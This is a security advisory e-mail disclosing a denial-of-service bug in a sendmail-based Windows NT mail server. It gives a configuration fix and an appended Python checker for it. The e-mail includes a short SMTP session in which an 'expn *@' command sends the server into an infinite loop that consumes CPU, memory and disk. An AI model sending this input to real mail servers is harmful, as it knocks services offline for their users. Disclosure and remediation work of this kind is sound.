`From: Vytis Fedaravicius <[email protected]>
Subject: DOS in Vintra systems Mailserver software.
Hello,
There is a bug in a free MailServer software for Windows NT from Vintra
systems ( http://www.vintra.com/mailsrvr.html ). Any remote user can cause
MTA to go nuts and make CPU usage go up to 99%, eat all available memory and
disk space.
Bug: one opens telnet to port 25, issues helo, mail from: and rcpt to:
commands, and instead of the data command uses expn *@. The software goes into an
infinite loop.
Fix: disable the expn command by editing sendmail.cf. Add the following line
and restart the MTA service.
O PrivacyOptions=needmailhelo, noexpn
Exploit (commands to enter are marked ">")
>telnet vulnerable.server.dom 25
220 vulnerable.server.dom ESMTP Sendmail 8.8.8/8.8.7; Mon, 20 Jul 1998
20:18:20 +0200 (Central Europe Daylight Time)
>helo EvilOne
250 vulnerable.server.dom Hello Administrators@localhost, pleased to meet
you
>mail from:bad.boy
250 bad.boy... Sender ok
>rcpt to:resourceLeaker
550 resourceLeaker... User unknown
>expn *@
550 *@... User unknown
550 bad.boy... User unknown
550 bad.boy... User unknown
...hundreds of these lines get logged and memory is allocated, cpu usage
increases wildly
550 bad.boy... User unknown
550 bad.boy... User unknown
....
This software is sendmail based, so maybe other implementations are
also vulnerable? Vintra systems were notified.
Vytis Fedaravicius
System administrator
Omnitel
e-mail: [email protected]
`
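To confirm that the fix line from the message above is actually in effect, the following added example (not part of the original e-mail or of the vendor's software) scans sendmail.cf text for the two PrivacyOptions flags the advisory names. It assumes that flags from several PrivacyOptions lines accumulate, that the old short form `Op` sets the same option, and that `goaway` covers both flags; the function names and sample configurations are constructed for illustration.

```python
import re

# The two flags from the advisory's fix line. "goaway" is sendmail's shorthand
# that switches on both of them (along with other restrictions).
WANTED = ("needmailhelo", "noexpn")
LONG = re.compile(r"^O\s+(?i:PrivacyOptions)\s*=(.*)$")
SHORT = re.compile(r"^Op(.*)$")  # old single-letter form of the same option

def privacy_flags(cf_text):
    """Return the set of PrivacyOptions flags set anywhere in sendmail.cf text."""
    flags = set()
    for line in cf_text.splitlines():
        # Match at column 0 only, so "#O PrivacyOptions=..." stays a comment.
        m = LONG.match(line) or SHORT.match(line)
        if m:
            # Assumption: flags from multiple lines accumulate.
            # Flags may be separated by commas, spaces, or both.
            flags.update(f.lower() for f in re.split(r"[,\s]+", m.group(1)) if f)
    return flags

def missing_flags(cf_text):
    """List the advisory's flags that the configuration does not enable."""
    flags = privacy_flags(cf_text)
    if "goaway" in flags:
        return []
    return [f for f in WANTED if f not in flags]

# Constructed sample configurations (not taken from a real server).
SAMPLES = {
    "fixed": "O PrivacyOptions=needmailhelo, noexpn\n",
    "commented_out": "#O PrivacyOptions=needmailhelo, noexpn\n"
                     "O PrivacyOptions=authwarnings\n",
    "short_form": "Opgoaway\n",
    "half_applied": "O PrivacyOptions=needmailhelo\n",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        gaps = missing_flags(text)
        print(f"{name}: {'OK' if not gaps else 'missing ' + ', '.join(gaps)}")
```

The `commented_out` sample is the case worth checking for by hand as well: the fix line is present in the file but has no effect.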